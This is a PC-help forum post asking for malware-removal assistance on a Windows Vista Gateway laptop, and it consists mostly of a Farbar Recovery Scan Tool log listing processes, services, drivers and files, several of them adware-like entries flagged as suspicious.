• Welcome to Free PC Help, a free PC Help forum to get help with your computer problems.

    Free PC Help is a community that offers free computer help and support for all users, all ages, worldwide.

    In order to start asking questions or contribute on someone else's post you will first need to register. Don't worry - it's quick and easy and once you have registered you will have instant access to the entire forum.

    If you do decide to join the forums you will not have the option to send Private Messages [ PMs ] or add a Signature until you have made 5 posts or more. This is an attempt to try to stop Spammers using the PM system or adding links to their Signature.

  • Due to the complexity and risks involved our formally trained malware staff will be the only ones allowed to help with malware removal advice. Thank you.

Windows Vista Malware

Rustys

Joined
Aug 28, 2017
Messages
134
Location
Here since I am not there
PC Experience
Very Experienced
#1
I was asked to see if I could get this system up and running.

Windows Vista 32 bit Gateway Laptop

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 24.10.2018
Ran by Angela (administrator) on ANGELA-PC (20-03-2007 01:02:34)
Running from C:\Users\Angela\Desktop
Loaded Profiles: Angela (Available Profiles: Angela)
Platform: Microsoft® Windows Vista™ Home Premium Service Pack 2 (X86) Language: English (United States)
Internet Explorer Version 9 (Default browser: IE)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: FRST Tutorial - How to use Farbar Recovery Scan Tool - Malware Removal Guides and Tutorials

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
() C:\Program Files\74697254-1425516543-2D2D-2D2D-0003254135CB\knsj6E67.tmp
() C:\Program Files\GATEWAY\Gateway Recovery Management\Service\ETService.exe
() C:\Users\Angela\AppData\Roaming\74697254-1425516543-2D2D-2D2D-0003254135CB\jnsqBF1A.tmp
() C:\Program Files\Motorola\MotoHelper\MotoHelperService.exe
(SupportSoft, Inc.) C:\Program Files\Common Files\supportsoft\bin\sprtlisten.exe
(Hefei Hejunzhengce Info Tech Co., Ltd.) C:\Program Files\Windows Audio\R1\AudioSrv.exe
() C:\Program Files\NETGEAR\WNA1000M\WlanWpsSvc.exe
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE
(@Microsoft Corporation) C:\Program Files\Windows Network Services\v9\wmnserv.exe
(Conexant Systems, Inc.) C:\Windows\System32\drivers\XAudio.exe
(Microsoft Corporation) C:\Windows\ehome\ehtray.exe
(Microsoft Corporation) C:\Windows\ehome\ehmsas.exe
(Microsoft Corporation) C:\Windows\System32\schtasks.exe
(Absolute Software Corp.) C:\Windows\System32\rpcnet.exe
() C:\Program Files\Motorola\MotoHelper\MotoHelperAgent.exe
(Microsoft Corporation) C:\Windows\System32\wbem\WMIADAP.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKU\S-1-5-21-2860630475-1531993715-2310474269-1000\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [125952 2008-01-20] (Microsoft Corporation)
HKU\S-1-5-21-2860630475-1531993715-2310474269-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\system32\Aurora.scr [1370624 2008-01-20] (Microsoft Corporation)
AppInit_DLLs: C:\ProgramData\FlashBeat\THIHPQ32.dll => No File
AppInit_DLLs: __C:\PROGRA~1\SEARCH~1\SEARCH~1\bin\VC32LO~1.DLL => C:\Program Files\SearchProtect\SearchProtect\bin\VC32Loader.dll [218384 2015-02-19] ()
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\NETGEAR WNA1000M Genie.lnk [2013-07-31]
ShortcutTarget: NETGEAR WNA1000M Genie.lnk -> C:\Program Files\NETGEAR\WNA1000M\WNA1000M.exe ()

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 75.75.75.75 75.75.76.76
Tcpip\..\Interfaces\{B70AE2D1-D67F-4712-BEEC-16719D97668E}: [DhcpNameServer] 75.75.75.75 75.75.76.76
Tcpip\..\Interfaces\{F9FE20A3-34D6-449E-8914-12FC15E7F958}: [DhcpNameServer] 75.75.75.75 75.75.76.76

Internet Explorer:
==================
HKU\S-1-5-21-2860630475-1531993715-2310474269-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/?ocid=iehp
SearchScopes: HKU\S-1-5-21-2860630475-1531993715-2310474269-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
Toolbar: HKU\S-1-5-21-2860630475-1531993715-2310474269-1000 -> No Name - {21FA44EF-376D-4D53-9B0F-8A89D3229068} - No File
Toolbar: HKU\S-1-5-21-2860630475-1531993715-2310474269-1000 -> No Name - {604BC32A-9680-40D1-9AC6-E06B23A1BA4C} - No File
Toolbar: HKU\S-1-5-21-2860630475-1531993715-2310474269-1000 -> No Name - {D4027C7F-154A-4066-A1AD-4243D8127440} - No File
DPF: {166B1BCA-3F9C-11CF-8075-444553540000} hxxp://download.macromedia.com/pub/shockwave/cabs/director/sw.cab
Handler: ms-itss - {0A9007C0-4076-11D3-8789-0000F8105754} - c:\Program Files\Common Files\Microsoft Shared\Information Retrieval\msitss.dll [2007-06-08] (Microsoft Corporation)

FireFox:
========
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: (Microsoft .NET Framework Assistant) - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-09-07] [Legacy] [not signed]
FF HKLM\...\Firefox\Extensions: [{3252b9ae-c69a-4eaf-9502-dc9c1f6c009e}] - C:\Program Files\Microsoft\Search Enhancement Pack\Default Manager\DMExtension
FF Extension: (Default Manager) - C:\Program Files\Microsoft\Search Enhancement Pack\Default Manager\DMExtension [2011-01-07] [Legacy] [not signed]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.40728.0\npctrl.dll [2015-07-28] ( Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll [2010-11-10] (Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll [2010-11-10] (Microsoft Corporation)
FF Plugin: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll [2008-07-29] (Microsoft Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.33.17\npGoogleUpdate3.dll [2018-10-30] (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.33.17\npGoogleUpdate3.dll [2018-10-30] (Google Inc.)

Chrome:
=======
StartMenuInternet: Google Chrome.L7J5TMSOM5SFHPIGRLQDE2HRWY - C:\Users\Angela\AppData\Local\Microsoft\Internet Explorer\Application\46.10.2479.3\switcher_ie.exe

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 cyriryvo; C:\Program Files\74697254-1425516543-2D2D-2D2D-0003254135CB\knsj6E67.tmp [482816 2015-08-24] () [File not signed] <==== ATTENTION
R2 ETService; C:\Program Files\GATEWAY\Gateway Recovery Management\Service\ETService.exe [24576 2008-06-11] () [File not signed]
S3 GameConsoleService; C:\Program Files\Gateway Games\Gateway Game Console\GameConsoleService.exe [250616 2009-03-30] (WildTangent, Inc.)
R2 gyviboxy; C:\Users\Angela\AppData\Roaming\74697254-1425516543-2D2D-2D2D-0003254135CB\jnsqBF1A.tmp [193536 2015-03-04] () [File not signed]
S2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [4753104 2018-05-09] (Malwarebytes)
R2 rpcnet; C:\Windows\system32\rpcnet.exe [78032 2007-03-20] (Absolute Software Corp.)
R2 sprtlisten; C:\Program Files\Common Files\supportsoft\bin\sprtlisten.exe [1213728 2008-01-08] (SupportSoft, Inc.)
R2 WinAudioSrv_R1; C:\Program Files\Windows Audio\R1\AudioSrv.exe [4024920 2015-04-07] (Hefei Hejunzhengce Info Tech Co., Ltd.)
R2 WlanWpsSvc; C:\Program Files\NETGEAR\WNA1000M\WlanWpsSvc.exe [167936 2011-06-30] () [File not signed]
R2 wmmserv_r11; C:\Program Files\Windows Network Services\v9\wmnserv.exe [3402752 2015-11-17] (@Microsoft Corporation) [File not signed]

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 pneteth; C:\Windows\System32\DRIVERS\pneteth.sys [13440 2011-11-25] (June Fabrics Technology Inc.)
S3 protect; C:\Program Files\QualityChecker\qc.sys [10752 2015-12-30] () [File not signed]
R3 RTL8192cu; C:\Windows\System32\DRIVERS\WNA1000M.sys [700520 2011-01-31] (Realtek Semiconductor Corporation )
R1 RtlProt; C:\Windows\System32\DRIVERS\rtlprot.sys [25896 2007-04-23] (Windows (R) Codename Longhorn DDK provider)
R0 SymDS; C:\Windows\System32\drivers\NAV\1302000.00A\SYMDS.SYS [340088 2011-07-25] (Symantec Corporation)
R0 SymEFA; C:\Windows\System32\drivers\NAV\1302000.00A\SYMEFA.SYS [897656 2011-09-26] (Symantec Corporation)
R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT.SYS [127096 2011-12-29] (Symantec Corporation)
R1 SymIRON; C:\Windows\system32\drivers\NAV\1302000.00A\Ironx86.SYS [149624 2011-07-25] (Symantec Corporation)
R1 SYMTDIv; C:\Windows\System32\Drivers\NAV\1302000.00A\SYMTDIV.SYS [344184 2011-07-25] (Symantec Corporation)
S3 USBAAPL; C:\Windows\System32\Drivers\usbaapl.sys [43520 2012-02-15] (Apple, Inc.) [File not signed]
S3 UVCFTR; C:\Windows\System32\Drivers\UVCFTR_S.SYS [11776 2007-05-23] (Chicony Electronics Co., Ltd.)
R1 {a55667f1-a319-4629-a8b6-a68d9d3313ee}Gt; C:\Windows\System32\drivers\{a55667f1-a319-4629-a8b6-a68d9d3313ee}Gt.sys [55824 2015-03-04] (StdLib)
S1 cherimoya; system32\drivers\cherimoya.sys [X] <==== ATTENTION
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]
S1 qrnfd_1_10_0_9; system32\drivers\qrnfd_1_10_0_9.sys [X]
S1 swsedrvr_vt_1_10_0_29; system32\drivers\swsedrvr_vt_1_10_0_29.sys [X]
S3 vzandnetdiag; system32\DRIVERS\lgvzandnetdiag.sys [X]
S3 vzandnetdiag2; system32\DRIVERS\lgvzandnetdiag2.sys [X]
S3 vzandnetmodem; system32\DRIVERS\lgvzandnetmdm.sys [X]
S3 vzandnetndis; system32\DRIVERS\lgvzandnetndis.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-10-31 00:40 - 2018-10-31 00:40 - 000001857 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2018-10-31 00:40 - 2018-10-31 00:40 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2018-10-31 00:40 - 2018-10-31 00:40 - 000000000 ____D C:\ProgramData\Malwarebytes
2018-10-31 00:40 - 2018-10-31 00:40 - 000000000 ____D C:\Program Files\Malwarebytes
2018-10-31 00:40 - 2018-04-26 05:36 - 000128736 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbae.sys
2018-10-31 00:39 - 2018-10-31 00:39 - 076534856 _____ (Malwarebytes ) C:\Users\Angela\Desktop\mb3-setup-legacywos-3.5.1.2522-1.0.365-1.0.5292.exe
2018-10-31 00:35 - 2018-10-31 00:35 - 007592144 _____ (Malwarebytes) C:\Users\Angela\Desktop\AdwCleaner.exe
2018-10-30 22:25 - 2018-10-30 22:25 - 000068072 _____ (Absolute Software Corp.) C:\Windows\system32\agremove.exe
2018-10-30 22:16 - 2018-10-30 22:16 - 000000302 _____ C:\3C4D.tmp
2018-10-30 16:39 - 2018-10-30 22:27 - 000000000 ____D C:\Users\Angela\Desktop\New Folder
2018-10-30 11:46 - 2018-10-30 13:15 - 000000000 ____D C:\Windows\pss
2018-10-30 11:39 - 2018-10-30 11:39 - 000019912 ____H C:\Windows\Tasks\{080A7E47-0B08-0B0F-0411-0A047D0E1178}.job
2018-10-30 11:39 - 2018-10-30 11:39 - 000000000 ____D C:\ProgramData\c6b12a7f-08a7-1
2018-10-30 11:36 - 2018-10-30 11:36 - 000019728 ____H C:\Windows\Tasks\{05040C47-0805-0C05-0B11-0B0E05041109}.job
2018-10-30 11:36 - 2018-10-30 11:36 - 000000000 ____D C:\ProgramData\ca85ed86-4687-1
2018-10-29 10:54 - 2018-10-30 16:22 - 000000680 _____ C:\Users\Angela\AppData\Local\d3d9caps.dat
2015-11-18 14:07 - 2015-07-03 10:04 - 001316864 _____ (Microsoft Corporation) C:\Windows\system32\ole32.dll
2015-11-18 14:06 - 2015-07-31 13:27 - 000103120 _____ (Microsoft Corporation) C:\Windows\system32\PresentationCFFRasterizerNative_v0300.dll
2015-11-18 14:04 - 2015-06-17 10:50 - 002264576 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2015-11-18 14:04 - 2015-06-17 09:09 - 000073216 _____ (Microsoft Corporation) C:\Windows\system32\msiexec.exe
2015-11-18 14:02 - 2015-07-10 13:37 - 002067968 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2015-11-18 13:59 - 2015-07-22 14:54 - 012386816 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2015-11-18 13:59 - 2015-07-22 14:54 - 000367616 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2015-11-18 13:59 - 2015-07-22 14:51 - 001810432 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2015-11-18 13:59 - 2015-07-22 14:47 - 009751040 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2015-11-18 13:59 - 2015-07-22 14:46 - 001139712 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2015-11-18 13:59 - 2015-07-22 14:46 - 001129472 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2015-11-18 13:59 - 2015-07-22 14:45 - 001427968 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2015-11-18 13:59 - 2015-07-22 14:45 - 000231936 _____ (Microsoft Corporation) C:\Windows\system32\url.dll
2015-11-18 13:59 - 2015-07-22 14:45 - 000065536 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2015-11-18 13:59 - 2015-07-22 14:44 - 001804288 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2015-11-18 13:59 - 2015-07-22 14:44 - 000718336 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2015-11-18 13:59 - 2015-07-22 14:44 - 000607744 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2015-11-18 13:59 - 2015-07-22 14:44 - 000421888 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2015-11-18 13:59 - 2015-07-22 14:44 - 000142848 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2015-11-18 13:59 - 2015-07-22 14:43 - 002382848 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2015-11-18 13:59 - 2015-07-22 14:43 - 000353792 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2015-11-18 13:59 - 2015-07-22 14:43 - 000223232 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2015-11-18 13:59 - 2015-07-22 14:43 - 000073216 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2015-11-18 13:59 - 2015-07-22 14:43 - 000041472 _____ (Microsoft Corporation) C:\Windows\system32\msfeedsbs.dll
2015-11-18 13:59 - 2015-07-22 14:43 - 000011776 _____ (Microsoft Corporation) C:\Windows\system32\mshta.exe
2015-11-18 13:59 - 2015-07-22 14:43 - 000010752 _____ (Microsoft Corporation) C:\Windows\system32\msfeedssync.exe
2015-11-18 13:59 - 2015-07-22 14:42 - 000176640 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2015-11-18 13:58 - 2015-07-11 09:56 - 011587584 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2015-11-18 13:54 - 2015-07-10 13:37 - 001402368 _____ (Microsoft Corporation) C:\Windows\system32\msxml6.dll
2015-11-18 13:54 - 2015-07-10 13:37 - 001253376 _____ (Microsoft Corporation) C:\Windows\system32\msxml3.dll
2015-11-18 13:53 - 2015-05-31 02:11 - 000225792 _____ (Microsoft Corporation) C:\Windows\system32\cewmdm.dll
2015-11-18 13:52 - 2015-07-31 16:08 - 000034304 _____ (Adobe Systems) C:\Windows\system32\atmlib.dll
2015-11-18 13:52 - 2015-07-31 15:46 - 001029120 _____ (Microsoft Corporation) C:\Windows\system32\d3d10.dll
2015-11-18 13:52 - 2015-07-31 15:46 - 000219648 _____ (Microsoft Corporation) C:\Windows\system32\d3d10_1core.dll
2015-11-18 13:52 - 2015-07-31 15:46 - 000189952 _____ (Microsoft Corporation) C:\Windows\system32\d3d10core.dll
2015-11-18 13:52 - 2015-07-31 15:46 - 000160768 _____ (Microsoft Corporation) C:\Windows\system32\d3d10_1.dll
2015-11-18 13:52 - 2015-07-31 14:41 - 001172480 _____ (Microsoft Corporation) C:\Windows\system32\d3d10warp.dll
2015-11-18 13:52 - 2015-07-31 14:40 - 000486400 _____ (Microsoft Corporation) C:\Windows\system32\d3d10level9.dll
2015-11-18 13:52 - 2015-07-31 14:35 - 000682496 _____ (Microsoft Corporation) C:\Windows\system32\d2d1.dll
2015-11-18 13:52 - 2015-07-31 14:33 - 002066944 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2015-11-18 13:52 - 2015-07-31 14:33 - 001072640 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll
2015-11-18 13:52 - 2015-07-31 14:33 - 000802304 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll
2015-11-18 13:52 - 2015-07-31 14:33 - 000297472 _____ (Adobe Systems Incorporated) C:\Windows\system32\atmfd.dll
2015-11-18 13:49 - 2015-06-27 10:03 - 000783872 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2015-11-18 13:49 - 2015-06-27 10:02 - 000501248 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2015-11-18 13:49 - 2015-06-27 10:02 - 000218112 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2015-11-18 13:49 - 2015-06-27 10:01 - 000801280 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2015-11-18 13:49 - 2015-06-27 08:21 - 000217088 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2015-11-18 13:49 - 2015-06-27 08:21 - 000081408 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2015-11-18 13:49 - 2015-06-12 07:13 - 000440768 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2015-11-18 13:49 - 2015-01-08 18:17 - 000107008 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2015-09-10 08:23 - 2015-07-09 08:20 - 000304640 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv.sys
2015-09-10 08:23 - 2015-06-12 10:01 - 000298496 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2015-09-10 08:19 - 2015-07-01 09:57 - 000199680 _____ (Microsoft Corporation) C:\Windows\system32\WebClnt.dll
2015-09-08 09:08 - 2015-07-09 08:25 - 000151040 _____ (Microsoft Corporation) C:\Windows\system32\notepad.exe
2015-09-08 09:08 - 2015-07-09 08:25 - 000151040 _____ (Microsoft Corporation) C:\Windows\notepad.exe
2015-08-24 11:18 - 2018-10-30 23:22 - 000000000 ____D C:\Program Files\74697254-1425516543-2D2D-2D2D-0003254135CB
2015-08-05 01:03 - 2015-08-05 01:03 - 000877152 _____ (Microsoft Corporation) C:\Windows\system32\msvcr120_clr0400.dll
2015-08-05 01:03 - 2015-08-05 01:03 - 000538208 _____ (Microsoft Corporation) C:\Windows\system32\msvcp120_clr0400.dll
2015-06-25 09:42 - 2018-10-31 00:36 - 000000000 _____ C:\Users\Angela\Documents\IE11-Windows6.1-x86-en-us.exe
2015-06-17 02:01 - 2015-06-17 02:01 - 001202856 _____ (Microsoft Corporation) C:\Windows\system32\FM20.DLL
2015-06-12 03:15 - 2015-04-24 09:54 - 000532480 _____ (Microsoft Corporation) C:\Windows\system32\comctl32.dll
2015-06-12 03:14 - 2015-05-08 17:08 - 000894464 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2015-06-12 03:01 - 2015-05-04 16:51 - 010628608 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll
2015-06-12 03:01 - 2015-05-04 16:50 - 000007680 _____ (Microsoft Corporation) C:\Windows\system32\spwmp.dll
2015-06-12 03:01 - 2015-05-04 16:50 - 000004096 _____ (Microsoft Corporation) C:\Windows\system32\msdxm.ocx
2015-06-12 03:01 - 2015-05-04 16:50 - 000004096 _____ (Microsoft Corporation) C:\Windows\system32\dxmasf.dll
2015-06-12 03:01 - 2015-05-04 15:21 - 008147456 _____ (Microsoft Corporation) C:\Windows\system32\wmploc.DLL
2015-05-16 11:16 - 2018-10-30 18:35 - 000000000 ____D C:\Windows\Minidump
2015-05-16 11:02 - 2015-04-30 10:03 - 000279040 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2015-05-14 12:01 - 2015-04-10 17:22 - 000279552 _____ (Microsoft Corporation) C:\Windows\system32\services.exe
2015-04-14 22:45 - 2015-03-04 20:32 - 000244152 _____ (Microsoft Corporation) C:\Windows\system32\clfs.sys
2015-04-14 22:45 - 2015-03-04 20:23 - 000057344 _____ (Microsoft Corporation) C:\Windows\system32\clfsw32.dll
2015-04-07 13:19 - 2015-04-07 13:19 - 000000461 _____ C:\Users\Angela\Desktop\2015 - Shortcut.lnk
2015-04-07 13:18 - 2015-05-16 10:53 - 000000000 ____D C:\Users\Angela\Documents\2015
2015-04-07 13:17 - 2015-04-07 13:17 - 000000540 _____ C:\Users\Angela\Desktop\Reoccuring Payments - Shortcut.lnk
2015-04-07 13:15 - 2007-03-20 01:31 - 000000000 ____D C:\Users\Angela\Documents\Reoccuring Payments
2015-04-07 12:10 - 2018-10-30 13:13 - 000000000 ____D C:\Program Files\Internet Explorer 11
2015-04-07 12:10 - 2015-06-29 10:47 - 000000000 ____D C:\ProgramData\imexplorer
2015-04-07 10:54 - 2015-04-07 10:54 - 000000000 ____D C:\Program Files\Windows Audio
2015-04-06 01:05 - 2015-04-06 01:05 - 000240980 _____ C:\Users\Angela\Downloads\FTF_2015-04-06_1428303913734.pdf
2015-03-13 18:01 - 2015-03-24 20:28 - 000000000 ____D C:\ProgramData\Windows VXM
2015-03-13 18:01 - 2015-03-24 20:28 - 000000000 ____D C:\Program Files\Windows Network Accelerater
2015-03-13 17:42 - 2015-01-28 19:35 - 000369664 _____ (Microsoft Corporation) C:\Windows\system32\WMPhoto.dll
2015-03-13 17:40 - 2015-01-28 19:35 - 000975360 _____ (Microsoft Corporation) C:\Windows\system32\WindowsCodecs.dll
2015-03-13 17:30 - 2015-01-08 18:18 - 000064000 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2015-03-13 17:29 - 2015-01-20 20:02 - 000807936 _____ (Microsoft Corporation) C:\Windows\system32\msctf.dll
2015-03-05 19:22 - 2015-03-13 17:26 - 000000000 ____D C:\ProgramData\Optimizer
2015-03-05 19:22 - 2015-03-05 19:22 - 000000000 ____D C:\Users\Angela\Documents\DreamVideoSoft
2015-03-05 19:22 - 2015-03-05 19:22 - 000000000 ____D C:\Program Files\predm
2015-03-05 18:07 - 2014-11-25 20:05 - 000564224 _____ (Microsoft Corporation) C:\Windows\system32\oleaut32.dll
2015-03-05 18:02 - 2014-12-07 19:59 - 000306176 _____ (Microsoft Corporation) C:\Windows\system32\scesrv.dll
2015-03-05 17:58 - 2015-03-05 20:14 - 000000004 _____ C:\Windows\system32\029B560A371F4E00AB32838EBC01B9E7
2015-03-04 19:17 - 2015-03-06 19:22 - 000000000 ____D C:\Program Files\globalUpdate
2015-03-04 19:17 - 2015-03-05 17:57 - 000008840 _____ C:\Windows\system32\BasementDusterOff.ini
2015-03-04 19:17 - 2015-03-04 19:17 - 000000000 ____D C:\Users\Angela\AppData\Local\globalUpdate
2015-03-04 18:49 - 2018-10-30 23:23 - 000000000 ____D C:\Users\Angela\AppData\Roaming\74697254-1425516543-2D2D-2D2D-0003254135CB
2015-03-04 18:47 - 2015-03-04 13:15 - 000055824 _____ (StdLib) C:\Windows\system32\Drivers\{a55667f1-a319-4629-a8b6-a68d9d3313ee}Gt.sys
2015-03-04 18:43 - 2015-03-04 18:43 - 000000000 ____D C:\Users\Angela\AppData\Local\rito
2015-03-04 18:43 - 2015-03-04 18:43 - 000000000 ____D C:\Program Files\WSE_Binkiland
2015-03-04 18:43 - 2011-06-21 12:24 - 000032768 _____ C:\Windows\system32\Drivers\sp_rsdrv2.sys
2015-03-04 18:36 - 2015-03-05 19:11 - 000000000 ____D C:\Program Files\VideoLAN
2015-03-04 18:33 - 2015-03-05 19:09 - 000000000 ____D C:\Program Files\shopperz
2015-03-04 18:33 - 2015-03-04 18:33 - 000000000 ____D C:\Users\Angela\AppData\LocalLow\Company
2015-03-04 18:33 - 2015-03-04 18:33 - 000000000 ____D C:\Users\Angela\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A}
2015-03-04 18:32 - 2015-03-04 18:33 - 000019384 _____ C:\Windows\system32\Drivers\SPPD.sys
2015-03-04 18:32 - 2015-03-04 18:32 - 000000000 ____D C:\Users\Angela\AppData\Local\avayvaxvaa
2015-03-04 18:31 - 2015-03-04 18:32 - 000000000 ____D C:\Program Files\SearchProtect
2015-01-14 20:22 - 2014-12-18 18:25 - 000115200 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxdav.sys
2015-01-14 20:14 - 2014-12-05 21:14 - 000174080 _____ (Microsoft Corporation) C:\Windows\system32\nlasvc.dll
2015-01-14 20:14 - 2014-12-05 21:14 - 000093184 _____ (Microsoft Corporation) C:\Windows\system32\ncsi.dll
2015-01-14 20:14 - 2014-12-05 21:14 - 000048640 _____ (Microsoft Corporation) C:\Windows\system32\nlaapi.dll
2015-01-14 20:13 - 2014-12-05 21:14 - 000153600 _____ (Microsoft Corporation) C:\Windows\system32\profsvc.dll
2015-01-13 13:03 - 2014-11-03 18:19 - 000002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2014-12-12 13:21 - 2014-10-09 19:01 - 000449536 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll
2014-12-12 13:21 - 2014-10-09 19:00 - 001259008 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2014-12-12 13:21 - 2014-10-09 19:00 - 000146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2014-12-12 13:21 - 2014-10-09 17:22 - 000619520 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2014-12-12 13:16 - 2014-08-26 18:55 - 000002048 _____ (Microsoft Corporation) C:\Windows\system32\msxml3r.dll
2014-12-12 13:13 - 2014-10-23 19:04 - 000067072 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-12-12 13:09 - 2014-08-11 20:25 - 000729600 _____ (Microsoft Corporation) C:\Windows\system32\IMJP10K.DLL
2014-12-12 13:06 - 2014-10-02 19:18 - 000274432 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2014-12-12 13:06 - 2014-10-02 19:17 - 000396800 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll
2014-12-12 13:06 - 2014-10-02 19:17 - 000316928 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2014-12-12 13:06 - 2014-10-02 19:17 - 000170496 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll
2014-11-17 12:32 - 2014-11-17 12:32 - 000137766 _____ C:\Users\Angela\Documents\verizon bill.pdf
2014-10-17 11:11 - 2014-06-15 16:18 - 001131664 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll
2014-10-17 11:11 - 2014-06-13 12:22 - 000156824 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll
2014-10-17 11:11 - 2014-06-13 12:22 - 000081560 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll
2014-10-17 11:01 - 2014-09-04 17:27 - 000143360 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\fastfat.sys
2014-10-03 12:01 - 2012-08-21 13:01 - 000026840 _____ (GEAR Software Inc.) C:\Windows\system32\Drivers\GEARAspiWDM.sys
2014-10-03 12:00 - 2018-10-30 18:27 - 000000000 ____D C:\ProgramData\188F1432-103A-4ffb-80F1-36B633C5C9E1
2014-10-03 10:24 - 2014-06-26 16:17 - 000619664 _____ (Microsoft Corporation) C:\Windows\system32\icardagt.exe
2014-10-03 10:24 - 2014-06-26 16:17 - 000099480 _____ (Microsoft Corporation) C:\Windows\system32\infocardapi.dll
